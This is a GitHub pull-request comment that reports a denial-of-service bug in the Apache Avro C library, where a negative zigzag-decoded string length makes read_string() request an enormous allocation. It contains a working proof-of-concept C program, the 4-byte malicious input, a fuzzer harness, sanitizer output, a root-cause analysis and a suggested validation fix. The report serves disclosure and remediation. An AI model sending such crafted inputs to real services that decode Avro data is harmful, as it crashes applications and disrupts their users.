OwenSanzas commented on PR #3622: URL: https://github.com/apache/avro/pull/3622#issuecomment-3746521711
Yes, here is the context of this crash:

## Summary

A negative string length in Avro binary data causes an `allocation-size-too-big` crash in `read_string()`. The function reads the string length as a zigzag-encoded varint, which can represent negative numbers, but does not validate the decoded value before passing it to `avro_malloc()`.

## Version

- Apache Avro C library
- Tested on: current main branch
- Commit: HEAD

## Steps to Reproduce

### Method 1: Using a standalone PoC program (Easiest)

**Step 1**: Build Avro C library with AddressSanitizer:

```bash
git clone https://github.com/apache/avro.git
cd avro/lang/c
mkdir build && cd build
cmake .. \
  -DCMAKE_C_COMPILER=clang \
  -DCMAKE_C_FLAGS="-fsanitize=address -g -O1" \
  -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address"
make -j$(nproc)
```

**Step 2**: Create `poc.c` in the build directory:

```c
/*
 * PoC: Negative string length causes allocation-size-too-big
 *
 * This demonstrates that any application parsing Avro binary data
 * with a map<string> schema can crash from 4 bytes of malicious input.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <avro.h>

int main(void) {
    /*
     * Malicious input: 4 bytes that crash read_string()
     *
     * When parsed as map<string>:
     * - 0x01: block count varint, zigzag decode = -1, negated = 1 element
     * - 0x00: block size varint = 0
     * - 0x2f: string key length varint (47), zigzag decode = -24
     * - 0x00: (padding)
     *
     * read_string() calls avro_malloc(-24 + 1) = avro_malloc(0xFFFFFFFFFFFFFFE9)
     */
    uint8_t malicious_data[] = {0x01, 0x00, 0x2f, 0x00};
    size_t data_len = sizeof(malicious_data);

    const char *schema_json = "{\"type\":\"map\",\"values\":\"string\"}";

    printf("[*] PoC: Negative string length vulnerability (read_string)\n");
    printf("[*] Schema: %s\n", schema_json);
    printf("[*] Malicious input: 01 00 2f 00 (4 bytes)\n");
    printf("[*] The byte 0x2f (47) zigzag-decodes to -24\n\n");

    avro_schema_t schema;
    if (avro_schema_from_json(schema_json, strlen(schema_json), &schema, NULL)) {
        fprintf(stderr, "[!] Failed to parse schema: %s\n", avro_strerror());
        return 1;
    }

    avro_reader_t reader = avro_reader_memory((const char *)malicious_data, data_len);
    avro_value_iface_t *iface = avro_generic_class_from_schema(schema);
    avro_value_t value;
    avro_generic_value_new(iface, &value);

    printf("[*] Calling avro_value_read()... (this will crash)\n\n");

    /* THIS TRIGGERS THE VULNERABILITY */
    avro_value_read(reader, &value);

    /* Won't reach here */
    avro_value_decref(&value);
    avro_value_iface_decref(iface);
    avro_reader_free(reader);
    avro_schema_decref(schema);
    return 0;
}
```

**Step 3**: Build and run the PoC:

```bash
clang -o poc poc.c \
  -I../src \
  -L./src -lavro \
  -fsanitize=address \
  -Wl,-rpath,./src
./poc
```

### Method 2: Using the fuzzer

**Step 1**: Build Avro C library with AddressSanitizer (same as above).

**Step 2**: Save the fuzzer code below as `value_reader_fuzzer.c`.

**Step 3**: Build the fuzzer:

```bash
clang -g -O1 -fsanitize=address,fuzzer \
  -I../src \
  value_reader_fuzzer.c \
  -L./src -lavro \
  -Wl,-rpath,./src \
  -o value_reader_fuzzer
```

**Step 4**: Create PoC input and run:

```bash
# Create 4-byte malicious input
# First byte 0x34 (52) selects schema index 52 % 20 = 12 = map<string>
# Remaining bytes: 01 00 2f triggers the bug
printf '\x34\x01\x00\x2f' > poc_input.bin
./value_reader_fuzzer poc_input.bin
```

## Expected Behavior

The Avro C library should validate that the string length is non-negative and return an error for malformed data.

## Actual Behavior

```
==PID==ERROR: AddressSanitizer: requested allocation size 0xffffffffffffffe9 (0x7f0 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0)
    #0 0x... in realloc (...)
    #1 0x... in read_string /path/to/avro/lang/c/src/encoding_binary.c:179:16
    #2 0x... in read_map_value /path/to/avro/lang/c/src/value-read.c:103:4
    #3 0x... in read_value /path/to/avro/lang/c/src/value-read.c:368:11
    ...

SUMMARY: AddressSanitizer: allocation-size-too-big ... in realloc
```

## Root Cause Analysis

In `lang/c/src/encoding_binary.c:172-186`, the `read_string()` function reads the string length as a zigzag-encoded varint:

```c
static int read_string(avro_reader_t reader, char **s, int64_t *len)
{
    int rval;
    int64_t str_len = 0;
    check_prefix(rval, read_long(reader, &str_len),
                 "Cannot read string length: ");
    *len = str_len + 1;               // +1 for null terminator
    *s = (char *) avro_malloc(*len);  // BUG: str_len can be negative!
    ...
}
```

**Control flow for crash input `34 01 00 2f`:**

1. Fuzzer input: `34 01 00 2f` (4 bytes)
2. First byte `0x34` (52) selects schema index: `52 % 20 = 12` → `map<string>`
3. `read_map_value()` reads block_count from `0x01`:
   - Zigzag decode: `(1 >> 1) ^ -(1 & 1) = 0 ^ -1 = -1`
   - Negated for map: `abs(-1) = 1` (1 element in block)
4. `read_map_value()` reads block_size from `0x00` → 0
5. `read_string()` reads key length from `0x2f` (47):
   - Zigzag decode: `(47 >> 1) ^ -(47 & 1) = 23 ^ -1 = -24`
6. `avro_malloc(-24 + 1)` → `avro_malloc(0xFFFFFFFFFFFFFFE9)` → CRASH

**Zigzag encoding explanation:**

Avro uses zigzag encoding for signed integers:

- Encode: `(n << 1) ^ (n >> 63)`
- Decode: `(n >> 1) ^ -(n & 1)`

This means byte value `0x2f` (47) decodes to `-24`:

```
n = 47 = 0b00101111
n >> 1 = 23
n & 1 = 1
-(n & 1) = -1 = 0xFFFFFFFFFFFFFFFF
result = 23 ^ -1 = -24
```

## Impact

- **DoS**: Application crash via allocation failure
- **CWE-789**: Memory Allocation with Excessive Size Value
- **Affected**: Any application using Avro C library to decode untrusted binary data

Attack vectors:

- Avro RPC services accepting binary requests
- Message queue consumers (Kafka with Avro serialization)
- Data processing pipelines
- Any service that deserializes Avro binary data with known schemas

## Suggested Fix

> **Note**: This is a quick fix for this specific vulnerability.
> A comprehensive audit of all `read_long()` call sites that use decoded values for memory allocation is recommended, as similar issues may exist elsewhere in the codebase (e.g., `read_bytes()`).

Add validation for negative length in `read_string()`:

```c
static int read_string(avro_reader_t reader, char **s, int64_t *len)
{
    int rval;
    int64_t str_len = 0;
    check_prefix(rval, read_long(reader, &str_len),
                 "Cannot read string length: ");
    if (str_len < 0) {
        avro_set_error("Invalid string length: %" PRId64, str_len);
        return EINVAL;
    }
    *len = str_len + 1;
    *s = (char *) avro_malloc(*len);
    ...
}
```

Similar validation should be added to `read_bytes()` in the same file.

## Fuzzer

This issue was discovered using a custom Avro value reader fuzzer:

```c
/*
 * Copyright 2026 O2Lab @ Texas A&M University
 *
 * Fuzzer for Avro C Value Reader
 * Target: avro_value_read()
 */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <avro.h>

/* Predefined schemas for fuzzing */
static const char *SCHEMAS[] = {
    /* Primitive types */
    "\"null\"",
    "\"boolean\"",
    "\"int\"",
    "\"long\"",
    "\"float\"",
    "\"double\"",
    "\"bytes\"",
    "\"string\"",
    /* Array types */
    "{\"type\": \"array\", \"items\": \"int\"}",
    "{\"type\": \"array\", \"items\": \"string\"}",
    "{\"type\": \"array\", \"items\": \"bytes\"}",
    /* Map types */
    "{\"type\": \"map\", \"values\": \"int\"}",
    "{\"type\": \"map\", \"values\": \"string\"}",
    /* Record types */
    "{\"type\": \"record\", \"name\": \"TestRecord\", \"fields\": ["
        "{\"name\": \"f1\", \"type\": \"int\"},"
        "{\"name\": \"f2\", \"type\": \"string\"}"
    "]}",
    /* Nested record */
    "{\"type\": \"record\", \"name\": \"Outer\", \"fields\": ["
        "{\"name\": \"inner\", \"type\": {"
            "\"type\": \"record\", \"name\": \"Inner\", \"fields\": ["
                "{\"name\": \"value\", \"type\": \"long\"}"
            "]"
        "}}"
    "]}",
    /* Enum type */
    "{\"type\": \"enum\", \"name\": \"Color\", \"symbols\": [\"RED\", \"GREEN\", \"BLUE\"]}",
    /* Fixed type */
    "{\"type\": \"fixed\", \"name\": \"Hash\", \"size\": 16}",
    /* Union types */
    "[\"null\", \"string\"]",
    "[\"null\", \"int\", \"long\", \"string\"]",
    /* Complex nested type */
    "{\"type\": \"record\", \"name\": \"Complex\", \"fields\": ["
        "{\"name\": \"id\", \"type\": \"long\"},"
        "{\"name\": \"name\", \"type\": [\"null\", \"string\"]},"
        "{\"name\": \"tags\", \"type\": {\"type\": \"array\", \"items\": \"string\"}},"
        "{\"name\": \"metadata\", \"type\": {\"type\": \"map\", \"values\": \"bytes\"}}"
    "]}"
};

static const size_t NUM_SCHEMAS = sizeof(SCHEMAS) / sizeof(SCHEMAS[0]);

int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    if (size < 1) {
        return 0;
    }

    /* Use first byte to select schema */
    size_t schema_idx = data[0] % NUM_SCHEMAS;
    const char *schema_json = SCHEMAS[schema_idx];

    const uint8_t *binary_data = data + 1;
    size_t binary_size = size - 1;
    if (binary_size == 0) {
        return 0;
    }

    avro_schema_t schema = NULL;
    avro_value_iface_t *iface = NULL;
    avro_value_t value;
    avro_reader_t reader = NULL;
    int rc;

    rc = avro_schema_from_json_length(schema_json, strlen(schema_json), &schema);
    if (rc != 0 || schema == NULL) {
        return 0;
    }

    iface = avro_generic_class_from_schema(schema);
    if (iface == NULL) {
        avro_schema_decref(schema);
        return 0;
    }

    memset(&value, 0, sizeof(value));
    rc = avro_generic_value_new(iface, &value);
    if (rc != 0) {
        avro_value_iface_decref(iface);
        avro_schema_decref(schema);
        return 0;
    }

    reader = avro_reader_memory((const char *)binary_data, binary_size);
    if (reader == NULL) {
        avro_value_decref(&value);
        avro_value_iface_decref(iface);
        avro_schema_decref(schema);
        return 0;
    }

    /* This is where the vulnerability triggers */
    rc = avro_value_read(reader, &value);
    (void)rc;

    avro_reader_free(reader);
    avro_value_decref(&value);
    avro_value_iface_decref(iface);
    avro_schema_decref(schema);
    return 0;
}
```
